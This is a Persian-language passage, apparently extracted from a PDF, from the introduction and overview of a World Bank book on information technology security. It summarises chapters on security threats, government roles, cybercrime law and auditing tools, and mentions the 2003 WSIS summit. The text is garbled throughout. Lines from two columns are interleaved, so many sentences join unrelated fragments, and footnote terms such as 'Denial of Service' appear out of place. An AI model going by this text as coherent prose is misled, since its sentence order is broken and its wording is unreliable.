ﻛﻼﻥ ﺍﻣﻨﻴﺘـﻲ ﺩﺍﺭﻧـﺪ .ﺑﺨـﺶ ﭘـﻨﺠﻢ ﺑـﻪ ﺗﻔـﺼﻴﻞ ﺑـﻪ ﺑﺮﺭﺳـﻲ ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺍﻫﻤﻴﺖ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﺩ .ﻭﺍﺿﺢ ﺍﺳـﺖ ﻛـﻪ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﺗﻬﺪﻳﺪﺍﺕ ﻭﻳﮋﺓ ﺍﻣﻨﻴﺘﻲ ﻣﻲ ﭘﺮﺩﺍﺯﺩ ﻛﻪ ﺷﺎﻣﻞ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺍﺟﺘﻤﺎﻋﻲ ﻭ ﻓﻨـﻲ
ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ،ﺭﻭﺷـﻬﺎﻱ ﻧﻈـﺎﺭﺕ ﺑـﺮ ﺗﺮﺍﻓﻴـﻚ ﺍﻳﻨﺘﺮﻧﺖ ﺗﺪﻭﻳﻦ ﺷﺪﻩ ﺑﺎﺷﻨﺪ .ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺩﻭﻟﺘﻬـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﺷﺒﻜﻪﻫﺎﻱ ﻣﻬﻢ ،ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ١٧ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﻳـﻦ ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ﺩﺭ ﻣﺴﺎﺋﻞ ﻓﻨﻲ ﮔﺎﻣﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ
ﺳﻴﺴﺘﻤﻬﺎ ،ﻭ ﺭﻭﺵ ﻣﻨﺎﺳﺐ ﻛﺎﺭ ﺑـﺎ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺯﻣـﺎﻥ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺩﺍﺭﻧﺪ.
ﺑﺤﺮﺍﻥ ﻣﻲﺑﺎﺷﺪ. ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺣﺎﻭﻱ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺍﺳﺖ:
ﺑﺨﺶ ﭘﻨﺠﻢ ﺣﺎﻭﻱ ﻣﻄﺎﻟﺐ ﺯﻳﺮ ﺍﺳﺖ: • ﺷﺒﻜﺔ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺩﻳﮕﺮ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻛﻪ ﻣﺘﻌﻠﻖ ﺑـﻪ
• ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻩ ﺍﻣﺎ ﻧﻈﺎﺭﺕ ﺑﺮ ﺁﻧﻬﺎ ﺑـﺎ ﺩﻭﻟـﺖ ﺍﺳـﺖ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺳﻴﺴﺘﻢ؛ )ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﻭﺍﺑﺴﺘﮕﻲ ﻣﺘﻘﺎﺑﻞ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ(؛
ﺗﻬﺪﻳـﺪﺍﺕ ﻣﺨﺘﻠــﻒ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺍﺯ ﺳــﻮﻱ • ﻧﻘﺶ ﻛﻠﻲ ﺩﻭﻟﺖ ﻭ ﻭﻇﺎﻳﻒ ﺁﻥ ﺩﺭ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ •
ﻋﻮﺍﻣﻞ ﻣﺤﻴﻄـﻲ ﺑـﺮﺍﻱ ﺧﺮﺍﺑﻜـﺎﺭﻱ ﻭ ﺩﺯﺩﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ،ﺧﺼﻮﺻﻲ ،ﻭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ؛
ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ؛ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ •
ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺩﺍﺩﻩﻫــﺎ ﺩﺭ ﻣﻘﺎﺑﻠــﻪ ﺑــﺎ ﺍﻓ ـﺸﺎﻱ • ﺷﺒﻜﻪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺘﻲ ﺗﺪﻭﻳﻦ ﻣﻲﺷﻮﻧﺪ؛
١٨
ﻏﻴﺮﻋﻤﺪﻱ ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺑﺎ ﻋﻨﺎﻭﻳﻦ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺩﺍﺩﻩﻫـﺎ ﻣﻔﺎﻫﻴﻢ ﺳﻨﺘﻲ ﻛﻪ ﺑﻪ ﻧﺤﻮﻱ ﺑـﻪ ﻗﺎﻟـﺐ ﻗـﻮﺍﻧﻴﻦ ﺭﺍﻳﺎﻧـﻪﺍﻱ •
)ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴﺴﺘﻢ ﻭ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩﻫﺎ
١٩
ﻣﻨﺘﻘﻞ ﺷﺪﻩﺍﻧﺪ؛
ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﻮﺳﻂ ﺁﻧﻬﺎ( ﻭ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫﺎ )ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺍﻃﻼﻋـﺎﺕ ﺑـﻲﻧﻘـﺺ ﻭ ﺻـﺤﻴﺢ ﺑـﺎﻗﻲﺧﻮﺍﻫﻨـﺪ ﻣﺎﻧـﺪ( ﻗﻮﺍﻧﻴﻦ ،ﻣﻘﺮﺭﺍﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺑﺮ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ •
ﻣــﻲﻛﻨــﺪ .ﺍﻳــﻦ ﻛﺘــﺎﺏ ﻫﻤﭽﻨــﻴﻦ ﺷــﺎﻣﻞ ﻣﺮﺍﺟــﻊ ﻓﺮﺍﻭﺍﻧــﻲ ﺍﺯ ﭼﮕــﻮﻧﮕﻲ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻣﻤﻴــﺰﻱ ٢٧ﻭ ﻭﺭﻭﺩ ﺑــﻪ •
ﻣﻮﺿﻮﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺍﺑﻌﺎﺩ ﺩﻳﮕﺮ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﺳﻴﺐﭘـﺬﻳﺮ
ﭘﻮﺷﺶ ﻣﻲﺩﻫﻨﺪ ﻭ ﻟﺬﺍ ﺁﻣﻮﺧﺘﻦ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ،ﮔـﺎﻣﻲ ﺩﺭ ﺟﻬـﺖ ﻭ ﻳﺎﻓﺘﻦ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ ﺭﻭﻱ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺩﭼـﺎﺭ ﺗﻐﻴﻴـﺮ
ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﻮﻟﻴﺪ ﻇﺮﻓﻴﺖ ﺩﺭ ﺳﻄﺢ ﻣﺤﻠﻲ ﺩﺭ ﺟﻬـﺎﻥ ﺭﻭ ﺷﺪﻩﺍﻧﺪ.
ﺑﻪ ﮔﺴﺘﺮﺵ ﺍﻣﺮﻭﺯ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ .ﺍﻳﻦ ﻛﺘـﺎﺏ ﺗﻮﺳـﻂ ﺑﺎﻧـﻚ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻓﻨﻲ ﻭﻳـﮋﻩ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻢ ﻋﺎﻣﻠﻬـﺎﻱ ،Unix •
ﺟﻬﺎﻧﻲ ﻣﻨﺘﺸﺮ ﺷـﺪﻩ ﻭ ﺩﻳـﺴﻚ ﻓـﺸﺮﺩﻩ ﻭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺁﻥ ﻛـﻪ
،Windows ،Linuxﻭ Macintosh
ﺣــﺎﻭﻱ ﻣﻄﺎﻟــﺐ ﺟﺪﻳــﺪ ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﺍﺳــﺖ ﻧﻴــﺰ ﺩﺭ ﺍﺧﺘﻴــﺎﺭ
ﻋﻼﻗﻪﻣﻨﺪﺍﻥ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﺍﻭﻟـﻴﻦ ﻭﻳـﺮﺍﻳﺶ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ ﺑﻪ ﺩﻟﻴﻞ ﺣﺠﻢ ﻭ ﭘﻴﭽﻴﺪﮔﻲ ﻣﻮﺿـﻮﻉ ،ﭼﻨـﺪﻳﻦ ﺿـﻤﻴﻤﻪ ﻧﻴـﺰ ﺩﺭ
ﺍﺟﻼﺱ ﺟﻬﺎﻧﻲ ﺳـﺮﺍﻥ ﺟﺎﻣﻌـﺔ ﺍﻃﻼﻋـﺎﺗﻲ ) (WSISﺩﺭ ﮊﻧـﻮ ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﻛﺘﺎﺏ ﺁﻣﺪﻩ ﺍﺳﺖ.
ﺩﺳﺎﻣﺒﺮ ۲۰۰۳ﻣﻴﻼﺩﻱ ﺍﺭﺍﺋﻪ ﺷﺪ. ﭘﻴﻮﺳﺖ ۱ﺣﺎﻭﻱ ﻭﺍﮊﻩﻧﺎﻣﻪﺍﻱ ﺍﺯ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺠﻲ ﺍﺳـﺖ ﻛـﻪ
ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﻃﺒﻖ ﻣﻨﺸﻮﺭ ﺣﻖ ﺗﻜﺜﻴﺮ ﺟﻬﺎﻧﻲ ٢٨ﻣﺎﻳﻞ ﺑـﻪ ﺣﻔـﻆ ﺩﺭ ﺣﻮﺯﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﻗــﺎﻧﻮﻥ ﺣــﻖ ﺗﻜﺜﻴــﺮ ﺍﻳــﻦ ﻛﺘــﺎﺏ ﺍﺳــﺖ ﻭ ﺑــﻪ ﻫــﻴﭻ ﻋﻨــﻮﺍﻥ ﻣﻲﮔﻴﺮﻧﺪ ،ﻭ ﭘﻴﻮﺳﺘﻬﺎﻱ ۲ﺗﺎ ۵ﻧﻴﺰ ﻣﺮﺍﺟﻊ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻬﻴﻪ
ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﺗﺤﻘﻴﻖ ،ﺁﻣﻮﺯﺵ ﻭ ﺩﻳﮕﺮ ﻭ ﺗﺪﻭﻳﻦ ﻛﺘﺎﺏ ﺭﺍ ﻣﻌﺮﻓﻲ ﻧﻤﻮﺩﻩﺍﻧﺪ .ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺷﺎﻣﻞ ﻣـﺴﺘﻨﺪﺍﺕ
ﺍﻫﺪﺍﻑ ﺟﺰ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﺔ ﻋـﻀﻮ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ ﭼﺎﭘﻲ ،ﻣﺪﺍﺭﻙ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭﺑﺎﺭﺓ
ﻣﺠﺎﺯ ﻧﻤﻲﺑﺎﺷﺪ .ﻳﺎﻓﺘﻪﻫﺎ ،ﺗﻔﺎﺳﻴﺮ ﻭ ﻧﺘﺎﻳﺞ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﻫﺴﺘﻨﺪ .ﺗﻮﺻـﻴﻪ ﻣـﻲﺷـﻮﺩ
ﻫﻤﮕﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ ﻭ ﻧﺒﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺑﺎﻧـﻚ ﺗﻤﺎﻣﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﺑﻪ ﻣﺮﺍﺟﻌﻲ ﻛﻪ ﺩﺭ ﺑﺨﺶ ﻣﻨﺎﺑﻊ ﻭ ﻣﺂﺧﺬ ﺫﻛـﺮ
ﺟﻬﺎﻧﻲ ،ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺁﻥ ،ﺍﻋﻀﺎﻱ ﻫﻴـﺄﺕ ﻣـﺪﻳﺮﻩ ﻭ ﻳـﺎ ﺷﺪﻩﺍﻧﺪ ﺳﺮﻱ ﺑﺰﻧﻨﺪ.
ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﻧﺴﺒﺖ ﺩﺍﺩ.
ﮔﺎﻣﻬﺎﻱ ﺁﺗﻲ ﻭ ﻧﺘﻴﺠﻪﮔﻴﺮﻱ
ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ
ﻛﻪ ﺗﺄﺛﻴﺮ ﻋﻤﺪﺓ ﺁﻧﻬﺎ ﺩﺭ ﺁﻣﻮﺯﺵ ﻭ ﭘﺮﻭﺭﺵ ،ﺑﻬﺪﺍﺷﺖ ،ﺗﺠـﺎﺭﺕ ﻭ
ﺩﻳﮕﺮ ﺑﺨﺸﻬﺎﻱ ﺟﺎﻣﻌﻪ ﻧﻤﺎﻳﺎﻥ ﺍﺳﺖ .ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ
ﻛﺸﻮﺭﻫﺎ ﻭ ﻣﺮﺩﻡ ﻣﻔﻴﺪ ﺍﺳﺖ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺟﺬﺍﺑﻴﺖ ﺧﺎﺻﻲ ﺑـﺮﺍﻱ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﻪ ﺁﻧﻬﺎ ﻛﻤﻚ ﻛﻨـﺪ ﺗـﺎ
ﺍﻧﺴﺠﺎﻡ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳـﻤﺖ ﺟﺎﻣﻌـﺔ ﺍﻗﺘـﺼﺎﺩﻱ ﺟﻬـﺎﻧﻲ ﺍﻓـﺰﺍﻳﺶ
ﺩﻫﻨﺪ؛ ﻭﻟﻲ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫﺎ ﻫﺰﻳﻨـﺔ
ﺯﻳـﺎﺩﻱ ﺩﺍﺭﺩ .ﺳــﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﻣــﺴﺘﻘﻴﻢ ﺧـﺎﺭﺟﻲ ﻭ ﺍﻃﻤﻴﻨــﺎﻥ ﻭ
ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ،ﺑﺴﺘﮕﻲ ﺑﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻦ
ﻭ ﻛﺎﺭﺁﻣﺪ ﻓﻨﺎﻭﺭﻱ ﻭ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺩﺍﺭﺩ .ﺩﻭﻟﺘﻬﺎ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ
ﺧﺎﻧﮕﻲ ﻫﻤﮕـﻲ ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺷـﺒﻜﻪﻫـﺎ ﻭ ﺳـﺮﻣﺎﻳﻪﻫـﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻃﻼﻋﺎﺗﻲ ﺁﻧﻬﺎ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﻧـﺪ .ﺍﻳـﻦ ﻛﺘـﺎﺏ
ﺣﺎﻭﻱ ﻣﺠﻤﻮﻋﻪ ﺍﻱ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ ﺷـﻴﻮﻩ ﻫـﺎﻱ ﺭﺍﻳـﺞ ﻭ ﺍﻟﮕﻮﻫـﺎﻱ
ﺳــﺮﺁﻣﺪﻱ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﻣﻨﻴــﺖ ﺍﺳــﺖ ﻛــﻪ ﺑــﻪ ﺧﻮﺍﻧﻨــﺪﮔﺎﻥ ﺩﺭ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ -ﺑـﺮ ﺣـﺴﺐ ﺷـﺮﺍﻳﻂ -ﻛﻤـﻚ
24 Workstation
25 Denial of Service
26 Programmed Threats
28 Universal Copyright Convention 27 Auditing Tools
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﺟﻬـﺎﻧﻲ ﺑﻬـﺮﻩ ﺟـﺴﺘﻪ ﻭ
ﺑﻬﺮﻩﻭﺭﻱ ﻭ ﺟﺬﺍﺑﻴﺖ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻪ ﻣﺮﺍﺗﺐ ﺍﻓـﺰﺍﻳﺶ ﺩﺍﺩﻩ ﺍﺳـﺖ.
ﻫﺮ ﭼﻨﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺩﻡ ﺗﻔـﺎﻭﺗﻲ ﻣﻴـﺎﻥ ﺷـﺒﻜﺔ ﺟﻬـﺎﻧﻲ ﻭﺏ ﻭ
ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺋﻞ ﻧﻴـﺴﺘﻨﺪ ،ﻭﻟـﻲ ﺩﺭ ﻭﺍﻗـﻊ ﻭﺏ ﺗﻨﻬـﺎ ﻳﻜـﻲ ﺍﺯ ﺍﻳـﻦ
ﺧﺪﻣﺎﺕ) ٧ﻭ ﺍﻟﺒﺘﻪ ﻣﻬﻤﺘﺮﻳﻦ ﺁﻧﻬﺎ( ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻪ ﭼﻨﻴﻦ ﺍﺑﺰﺍﺭ ﻣﻘﺪﻣﻪ
ﻗﺪﺭﺗﻤﻨﺪﻱ ﺑﺮﺍﻱ ﺍﻃـﻼﻉﺭﺳـﺎﻧﻲ ﻭ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺗﺒـﺪﻳﻞ
ﻛﺮﺩﻩ ﺍﺳﺖ. ﻇﻬﻮﺭ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻳﻜﻲ ﺍﺯ ﺑﺎﺭﺯﺗﺮﻳﻦ ﭘﻴـﺸﺮﻓﺘﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ
ﺩﺭ ﻧﻴﻢﻗﺮﻥ ﺍﺧﻴﺮ ﺑﻪ ﺷﻤﺎﺭ ﻣﻲﺁﻳﺪ ﻛـﻪ ﺩﺭ ﺯﻧـﺪﮔﻲ ﻛﻨـﻮﻧﻲ ﺑـﺸﺮ
ﻃﻲ ﺩﻩ ﺳﺎﻝ ﺍﺧﻴﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻳﻚ ﺍﺑـﺰﺍﺭ ﻣﻬـﻢ ﺍﺭﺗﺒـﺎﻃﻲ ﻣﻴـﺎﻥ
ﺑﺼﻮﺭﺕ ﻋﺎﻣﻠﻲ ﺣﻴﺎﺗﻲ ﺩﺭﺁﻣﺪﻩ ﺍﺳﺖ ١.ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺎ ﺍﻳـﻦ
ﺗﻤﺎﻣﻲ ﺍﻗﺸﺎﺭ ﺟﺎﻣﻌﻪ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﻭ ﻣﺎ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﺁﻧـﻲ ﺑـﻪ
ﻧﻮﻉ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﻗﺎﻟﺐ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺗﺠﻠـﻲ ﻛـﺮﺩﻩ ﻭ ﺑـﻪ
ﺍﻃﻼﻋﺎﺕ ،ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺍﺧﺘـﺼﺎﺻﻲ ،ﺗﻤـﺎﻣﻲ ﺍﻧـﻮﺍﻉ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ
ﺍﺑﺰﺍﺭﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﻭ ﺭﻓﻊ ﻧﻴﺎﺯﻫﺎﻱ ﺷﺨﺼﻲ ﺗﺒـﺪﻳﻞ
ﻛﺎﺭﺑﺮﺩﻱ ،ﺗﺠﺎﺭﻱ ،ﺭﻭﺍﺑﻂ ﻛﺎﺭﻱ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﻣﺎﻟﻲ ﺑـﻪ ﺁﻥ
ﺷﺪﻩ ﺍﺳـﺖ .ﺩﺭ ﺳـﺎﻝ ۱۹۵۱ﻣـﻴﻼﺩﻱ ﺯﻣﺎﻧﻴﻜـﻪ ﺍﻭﻟـﻴﻦ ﺭﺍﻳﺎﻧـﺔ
ﻭﺍﺑﺴﺘﻪ ﺍﻳﻢ .ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺩﺳﺘﺮﺳﻲ ﺁﺳﺎﻥ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ
ﺩﻳﺠﻴﺘﺎﻝ ﺗﺠﺎﺭﻱ ﻣﻮﺳﻮﻡ ﺑﻪ UNIVAC Iﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺁﻣـﺎﺭ ﻭ
ﻣﻮﻓﻘﻴﺖ ﭘﺎﻳﺪﺍﺭ ﻭ ﻣﺪﺍﻭﻡ ﻛـﺸﻮﺭﻫﺎﻱ ﺗﻮﺳـﻌﻪﻳﺎﻓﺘـﻪ ﻳـﻚ ﻋﺎﻣـﻞ
ﺳﺮﺷﻤﺎﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺁﻣﺮﻳﻜﺎ ٢ﺗﺤﻮﻳﻞ ﺩﺍﺩﻩ ﺷﺪ ،ﺑﺴﻴﺎﺭﻱ ﺍﺯ
ﺣﻴﺎﺗﻲ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﺍﻫﻤﻴﺖ ﺁﻥ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫـﺎﻱ ﺩﺭﺣـﺎﻝ
ﻣﺮﺩﻡ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﭼﻴﺰﻱ ﻧﻤﻲﺩﺍﻧﺴﺘﻨﺪ ﻭ ﺁﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻧﻴـﺰ
ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﺑﺴﺮﻋﺖ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ .ﺁﺛﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ
ﺗﻨﻬﺎ ﺩﺭ ﺗﻌﺪﺍﺩ ﺍﻧﮕﺸﺖ ﺷﻤﺎﺭﻱ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻭ ﺁﺯﻣﺎﻳـﺸﮕﺎﻫﻬﺎﻱ
ﻭ ﻧﺘﺎﻳﺞ ﺣﺎﺻﻠﻪ ﺍﺯ ﺍﻧﻘﻼﺏ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻣﺮﺯ ﻓﻮﺍﻳـﺪ ﻣـﺴﺘﻘﻴﻢ ﺁﻧﻬـﺎ
ﺗﺤﻘﻴﻘﺎﺗﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻨﺪ .ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺰﺭﮒ ،ﮔﺮﺍﻥ
ﻓﺮﺍﺗﺮ ﺭﻓﺘﻪ ﻭ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﺷﻮﺩ ﻛﻪ ﺗﺄﺛﻴﺮﺍﺕ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺰ ﺩﺭ ﺭﺍﻩ
